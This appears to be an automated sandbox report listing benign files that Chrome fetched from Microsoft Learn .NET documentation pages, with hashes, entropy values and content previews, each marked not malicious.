                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):3130
                                                                                                                                                                                                                                                              Entropy (8bit):4.790069981348324
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                                                                                              MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                                                                                              SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                                                                                              SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                                                                                              SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
                                                                                                                                                                                                                                                              Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):18367
                                                                                                                                                                                                                                                              Entropy (8bit):7.7772261735974215
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                                                                                              MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                                                                                              SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                                                                                              SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                                                                                              SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):13339
                                                                                                                                                                                                                                                              Entropy (8bit):7.683569563478597
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                                                                                              MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                                                                                              SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                                                                                              SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                                                                                              SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):18367
                                                                                                                                                                                                                                                              Entropy (8bit):7.7772261735974215
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                                                                                              MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                                                                                              SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                                                                                              SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                                                                                              SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1154
                                                                                                                                                                                                                                                              Entropy (8bit):4.59126408969148
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                                                                                              MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                                                                                              SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                                                                                              SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                                                                                              SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                              Entropy (8bit):3.875
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:HMB:k
                                                                                                                                                                                                                                                              MD5:0B04EA412F8FC88B51398B1CBF38110E
                                                                                                                                                                                                                                                              SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
                                                                                                                                                                                                                                                              SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
                                                                                                                                                                                                                                                              SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
                                                                                                                                                                                                                                                              Preview:CgkKBw2/5iXyGgA=
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):3130
                                                                                                                                                                                                                                                              Entropy (8bit):4.790069981348324
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                                                                                              MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                                                                                              SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                                                                                              SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                                                                                              SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):15427
                                                                                                                                                                                                                                                              Entropy (8bit):7.784472070227724
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                                                                                              MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                                                                                              SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                                                                                              SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                                                                                              SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):464328
                                                                                                                                                                                                                                                              Entropy (8bit):5.074669864961383
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:6144:XegPryKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:gKCerXyUh
                                                                                                                                                                                                                                                              MD5:CB0701D474D57F8C8E2F569161CE0349
                                                                                                                                                                                                                                                              SHA1:4BE2E0C148DED16354E7A91FE721644897C5503C
                                                                                                                                                                                                                                                              SHA-256:AD52B36EA7D484522BA3382718BD370E6804F7B46AD3BE821D94AF81D66F40EB
                                                                                                                                                                                                                                                              SHA-512:BB54B08F64F85498D6592C614F844842CD87BA5A9127B1D2B8AFAEC8086DE171642EA2D241708C9D06DEFDDFA04A4189AAD4814AFD15303C6481F23793CD2D3F
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/site-ltr.css
                                                                                                                                                                                                                                                              Preview:.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):195719
                                                                                                                                                                                                                                                              Entropy (8bit):5.430057012529021
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVli2:Wof3G0NSkNzMeO7z/l3lh
                                                                                                                                                                                                                                                              MD5:9445D8D43537540BC89651C93A9C3832
                                                                                                                                                                                                                                                              SHA1:EC3066770D52DB58CB7E44C54C3ABAA40CEB121A
                                                                                                                                                                                                                                                              SHA-256:586D6261C80CBF8CDEC59DE01F1A1D09B32C04E87431E4333A0BF4D8990C2755
                                                                                                                                                                                                                                                              SHA-512:F2BB9BB14C24883499AF2FAD35EE95AF7BF3D9B0431D8072C54C9D5946C751E04D952F5AD5D937F6CBC7C56177FA2091A5A6F33318F2907E9D3628C28E7FFC9C
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):25422
                                                                                                                                                                                                                                                              Entropy (8bit):5.151101794904936
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:768:63jLjnjrjGjXMQjtzjMFzXYHv1gWj/rlOVqnACpK3o3hhl0OU2/8BlsRw/6szFr7:aHBQv11pOVqlh382/rIN1D
                                                                                                                                                                                                                                                              MD5:B5C4D5CE538E3982A376EC2923192D6B
                                                                                                                                                                                                                                                              SHA1:A1BD7A4345A58117D6201305E0B5CB893C827BAD
                                                                                                                                                                                                                                                              SHA-256:5F999F0A104864DCE808453CEBB0B7291ADCDF2516E40011B0BB4E9ACCD71C0C
                                                                                                                                                                                                                                                              SHA-512:87A71EF2621453B2DE11DA60E02EED762F9FFBAD9D7052CB95CD1FBB6311E8AE3E5D430FC2315AC3FC20A06E627EAD95FC5E4F5B0AA17206728120A4CA9FB6AA
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and useren links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):207935
                                                                                                                                                                                                                                                              Entropy (8bit):5.420780972514107
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                                                                                                              MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                                                                                                              SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                                                                                                              SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                                                                                                              SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                                                                                                                                                                                                                                                              Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):25422
                                                                                                                                                                                                                                                              Entropy (8bit):5.151101794904936
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:768:63jLjnjrjGjXMQjtzjMFzXYHv1gWj/rlOVqnACpK3o3hhl0OU2/8BlsRw/6szFr7:aHBQv11pOVqlh382/rIN1D
                                                                                                                                                                                                                                                              MD5:B5C4D5CE538E3982A376EC2923192D6B
                                                                                                                                                                                                                                                              SHA1:A1BD7A4345A58117D6201305E0B5CB893C827BAD
                                                                                                                                                                                                                                                              SHA-256:5F999F0A104864DCE808453CEBB0B7291ADCDF2516E40011B0BB4E9ACCD71C0C
                                                                                                                                                                                                                                                              SHA-512:87A71EF2621453B2DE11DA60E02EED762F9FFBAD9D7052CB95CD1FBB6311E8AE3E5D430FC2315AC3FC20A06E627EAD95FC5E4F5B0AA17206728120A4CA9FB6AA
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                                                                                                                                                                                              Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and useren links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):72
                                                                                                                                                                                                                                                              Entropy (8bit):4.241202481433726
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                                                                              MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                                                                              SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                                                                              SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                                                                              SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
